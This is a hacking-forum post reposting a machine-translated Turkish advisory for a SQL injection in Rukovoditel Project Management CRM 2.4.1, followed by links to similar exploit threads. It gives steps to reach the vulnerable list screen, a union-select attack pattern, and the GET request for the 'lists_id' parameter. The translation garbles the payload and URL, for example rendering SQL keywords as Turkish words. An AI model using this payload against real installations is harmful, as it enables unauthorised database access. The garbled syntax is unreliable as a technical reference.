Rukovoditel PRM-CRM 2.4.1 SQL Vuln.
by Adient - 05-30-2019, 10:52 PM
#1
# Başlık Exploit: Rukovoditel Proje Yönetimi CRM 2.4.1 - 'lists_id' SQL Injection
# Dork N / A
# Tarih: 27-01-2019
# Exploit Author: Tolga KATIRCI
# Satıcı Web Sitesi: https://www.rukovoditel.net/
# Yazılım Bağlantı: https://sourceforge.net/projects/rukovoditel/
# Sürüm: 2.4.1
# Kategori: webapps
# Üzerinde test: Wampp @Win
# CVE N / A
# https://cxsecurity.com/issue/WLB-2019010289
# Yazılım Descr * iption: Rukovoditel ücretsiz bir web tabanlı açık kaynak proje yönetimi olduğunu 
uygulama. Geleneksel uygulamalardan çok farklı olarak Rukovoditel verir 
Kullanıcıların daha geniş ve kapsamlı bir yaklaşım proje yönetimine. Onun 
özelleştirme seçenekleri kullanıcılarının ek varlıkları oluşturmasına izin, değiştirmek 
ve aralarındaki ilişkiyi belirtmek ve gerekli oluşturmak 
raporlar. 

# güvenlik açıkları
# SQL enjeksiyon uygulanacak, kullanıcı giriş yapmanız gerekiyor.
Daha sonra küresel liste sekmesine Uygulama yapısı ekranından.
Yeni bir liste oluşturmak için yeni değer düğmesi ekleyin. Oluşturulan listeyi sql enjeksiyon uygulayabilirsiniz.
zayıflıkların resimler aşağıdadır.
https://i.hizliresim.com/nQJZm5.jpg
https://i.hizliresim.com/WqGmEQ.jpg

# POC - SQLI
# Parametreleri: lists_id = 1 (string)
# Saldırı Kalıbı: -1' + union + seçme + 1,2 - +
http: # İsteği GET // localhost / [PATH] /index.php?module=global_lists/choices lists_id = 1' [SQL]
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Newsbull Haber Script XSS Vuln. Adient 0 147 05-30-2019, 10:55 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 104 05-30-2019, 10:54 PM
Last Post: Adient
PilusCart 1.4.1 - SQL Vuln. storix 0 87 05-30-2019, 10:40 PM
Last Post: storix

 Users browsing this thread: 1 Guest(s)